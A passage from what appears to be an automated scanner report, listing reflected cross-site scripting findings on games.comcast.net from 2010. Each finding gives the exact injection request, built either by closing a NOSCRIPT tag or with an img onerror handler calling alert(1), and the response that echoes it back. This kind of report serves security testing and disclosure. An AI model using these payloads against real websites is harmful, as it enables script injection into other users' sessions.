Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /3d790</noscript><script>alert(1)</script>7026214fdcc/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:22 GMT
Server: Apache
Set-Cookie: ssid=dm4oq6gddukhq03ff53cru3dh1; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:22 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:22 GMT; path=/
Content-Length: 681
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1124116672.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /3d790</noscript><script>alert(1)</script>7026214fdcc/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html was not found on this server.</p>
...[SNIP]...

2.44. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 629ec"><img%20src%3da%20onerror%3dalert(1)>3d0a426c30 was submitted in the REST URL parameter 1. This input was echoed as 629ec"><img src=a onerror=alert(1)>3d0a426c30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /t_03cm629ec"><img%20src%3da%20onerror%3dalert(1)>3d0a426c30/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:11 GMT
Server: Apache
Set-Cookie: ssid=apef68r0bna5m4av39ircrrjh5; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:11 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:11 GMT; path=/
Set-Cookie: affiliate_code=t_03cm629ec%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3d0a426c30; expires=Fri, 17-Jun-2011 18:08:11 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=570534080.20480.0000; path=/
Content-Length: 29905

   
                                                                                                                                                                                                                                                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm
...[SNIP]...
<a onclick="passReport('download');" href="http://d.trymedia.com/d/ftag/dip_nt_en/t_03cm629ec"><img src=a onerror=alert(1)>3d0a426c30/VictorianMysteries_WiW.rga?curr_selected=USD&lang=en" class="dlFirst button">
...[SNIP]...

2.45. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload 3f34f</noscript><script>alert(1)</script>d734ce584e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s-1_1054_152543f34f</noscript><script>alert(1)</script>d734ce584e1/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:43 GMT
Server: Apache
Set-Cookie: ssid=lpsscof3a2tsmp7o30vko4vvl5; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:44 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:44 GMT; path=/
Content-Length: 687
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=570534080.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s-1_1054_152543f34f</noscript><script>alert(1)</script>d734ce584e1/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html was not found on this server.</p>
...[SNIP]...

2.46. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1/DownloadableGames

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ffd8"><img%20src%3da%20onerror%3dalert(1)>9464f5786ed was submitted in the REST URL parameter 1. This input was echoed as 5ffd8"><img src=a onerror=alert(1)>9464f5786ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /t_03cm5ffd8"><img%20src%3da%20onerror%3dalert(1)>9464f5786ed/s1/DownloadableGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:09:12 GMT
Server: Apache
Set-Cookie: ssid=qb2rqr3dv4la5or8978jl0edt0; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:09:12 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:09:12 GMT; path=/
Set-Cookie: affiliate_code=t_03cm5ffd8%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9464f5786ed; expires=Fri, 17-Jun-2011 18:09:12 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/
Content-Length: 71040

   
                                                                                                                                                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-stri
...[SNIP]...
<img src="http://cdn.media.trymedia.com/affiliate-files/t_03cm5ffd8"><img src=a onerror=alert(1)>9464f5786ed/images/GPpromo.gif" alt="GamePass - Get a FREE Game Now! Sign up for GamePass and receive a FREE game now, a FREE game every month and $5 off all additional GamePass games!" />
...[SNIP]...

2.47. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1/DownloadableGames

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload bc143</noscript><script>alert(1)</script>eef9c1bbfed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /bc143</noscript><script>alert(1)</script>eef9c1bbfed/s1/DownloadableGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:09:53 GMT
Server: Apache
Set-Cookie: ssid=kg24oua210erku2s7qg3rvkr76; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:09:53 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:09:53 GMT; path=/
Content-Length: 624
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /bc143</noscript><script>alert(1)</script>eef9c1bbfed/s1/DownloadableGames was not found on this server.</p>
...[SNIP]...

2.48. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1/DownloadableGames

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload b97f0</noscript><script>alert(1)</script>63f4f408e40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s1b97f0</noscript><script>alert(1)</script>63f4f408e40/DownloadableGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:10:07 GMT
Server: Apache
Set-Cookie: ssid=lj62dj8ljo6i9b7n8stg34sr70; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:10:07 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:10:07 GMT; path=/
Content-Length: 630
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s1b97f0</noscript><script>alert(1)</script>63f4f408e40/DownloadableGames was not found on this server.</p>
...[SNIP]...

2.49. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71d13"><img%20src%3da%20onerror%3dalert(1)>25e360604eb was submitted in the REST URL parameter 1. This input was echoed as 71d13"><img src=a onerror=alert(1)>25e360604eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /t_03cm71d13"><img%20src%3da%20onerror%3dalert(1)>25e360604eb/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:06 GMT
Server: Apache
Set-Cookie: ssid=9kfocedqu60qtq9gs61t22ojc3; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:06 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:06 GMT; path=/
Set-Cookie: affiliate_code=t_03cm71d13%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E25e360604eb; expires=Fri, 17-Jun-2011 18:08:06 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1107339456.20480.0000; path=/
Content-Length: 30063

   
                                                                                                                                                                                                                                                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm
...[SNIP]...
<a onclick="passReport('download');" href="http://d.trymedia.com/d/terminalstudio/dip_60m_en/t_03cm71d13"><img src=a onerror=alert(1)>25e360604eb/AtlantisBundle.rga?curr_selected=USD&lang=en" class="dlFirst button">
...[SNIP]...

2.50. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload cad9b</noscript><script>alert(1)</script>6d1d2cde714 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /cad9b</noscript><script>alert(1)</script>6d1d2cde714/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:17 GMT
Server: Apache
Set-Cookie: ssid=57ia8n32bvthj735oc230jm0g5; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:17 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:17 GMT; path=/
Content-Length: 663
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /cad9b</noscript><script>alert(1)</script>6d1d2cde714/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html was not found on this server.</p>
...[SNIP]...

2.51. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload 23787</noscript><script>alert(1)</script>34b01fab478 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s1_1050_1367523787</noscript><script>alert(1)</script>34b01fab478/DownloadableGames/Puzzle/Atlantis-Bundle.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:34 GMT
Server: Apache
Set-Cookie: ssid=dkrukt8915gi49v33gjhl0cq40; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:34 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:34 GMT; path=/
Content-Length: 669
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s1_1050_1367523787</noscript><script>alert(1)</script>34b01fab478/DownloadableGames/Puzzle/Atlantis-Bundle.html was not found on this server.</p>
...[SNIP]...

2.52. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3063"><img%20src%3da%20onerror%3dalert(1)>6a42dc0ab56 was submitted in the REST URL parameter 1. This input was echoed as f3063"><img src=a onerror=alert(1)>6a42dc0ab56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /t_03cmf3063"><img%20src%3da%20onerror%3dalert(1)>6a42dc0ab56/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:13 GMT
Server: Apache
Set-Cookie: ssid=h0nrl48tg0guhk13n8ltacb3h0; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:13 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:14 GMT; path=/
Set-Cookie: affiliate_code=t_03cmf3063%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6a42dc0ab56; expires=Fri, 17-Jun-2011 18:08:14 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=889235648.20480.0000; path=/
Content-Length: 29284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm
...[SNIP]...
<a onclick="passReport('download');" href="http://d.trymedia.com/d/ludia/dip_nt_en/t_03cmf3063"><img src=a onerror=alert(1)>6a42dc0ab56/PressYourLuck.rga?curr_selected=USD&lang=en" class="dlFirst button">
...[SNIP]...

2.53. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload e089a</noscript><script>alert(1)</script>951348d9f29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /e089a</noscript><script>alert(1)</script>951348d9f29/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:23 GMT
Server: Apache
Set-Cookie: ssid=sr7vraqja24ch6vd8b0pobha84; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:23 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:23 GMT; path=/
Content-Length: 665
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1241557184.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /e089a</noscript><script>alert(1)</script>951348d9f29/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html was not found on this server.</p>
...[SNIP]...

2.54. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload eeb6a</noscript><script>alert(1)</script>c4670f56420 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s1_1052_14739eeb6a</noscript><script>alert(1)</script>c4670f56420/DownloadableGames/Action/Press-Your-LuckTM.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache
Set-Cookie: ssid=utmgdutu5fcvcod3ovdibp5s64; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:39 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:39 GMT; path=/
Content-Length: 671
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1241557184.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s1_1052_14739eeb6a</noscript><script>alert(1)</script>c4670f56420/DownloadableGames/Action/Press-Your-LuckTM.html was not found on this server.</p>
...[SNIP]...

2.55. http://games.comcast.net/t_03cm/s2/WebGames [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s2/WebGames

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 73e24</noscript><script>alert(1)</script>fec4c25f5cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /73e24</noscript><script>alert(1)</script>fec4c25f5cb/s2/WebGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:09:26 GMT
Server: Apache
Set-Cookie: ssid=jf8r2ipsolnif7g17h7m327g65; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:09:26 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:09:26 GMT; path=/
Content-Length: 615
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=570534080.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /73e24</noscript><script>alert(1)</script>fec4c25f5cb/s2/WebGames was not found on this server.</p>
...[SNIP]...

2.56. http://games.comcast.net/t_03cm/s2/WebGames [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s2/WebGames

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload 8bce2</noscript><script>alert(1)</script>5b386e009e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s28bce2</noscript><script>alert(1)</script>5b386e009e3/WebGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:09:39 GMT
Server: Apache
Set-Cookie: ssid=s8tpq3a2d6nmt2277sqjgub284; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:09:39 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:09:39 GMT; path=/
Content-Length: 621
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1241557184.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s28bce2</noscript><script>alert(1)</script>5b386e009e3/WebGames was not found on this server.</p>
...[SNIP]...

2.57. http://games.comcast.net/t_03cm/s6/filter-casual/MacGames [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s6/filter-casual/MacGames

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload dc5c1</noscript><script>alert(1)</script>22c38537d71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /dc5c1</noscript><script>alert(1)</script>22c38537d71/s6/filter-casual/MacGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:11:18 GMT
Server: Apache
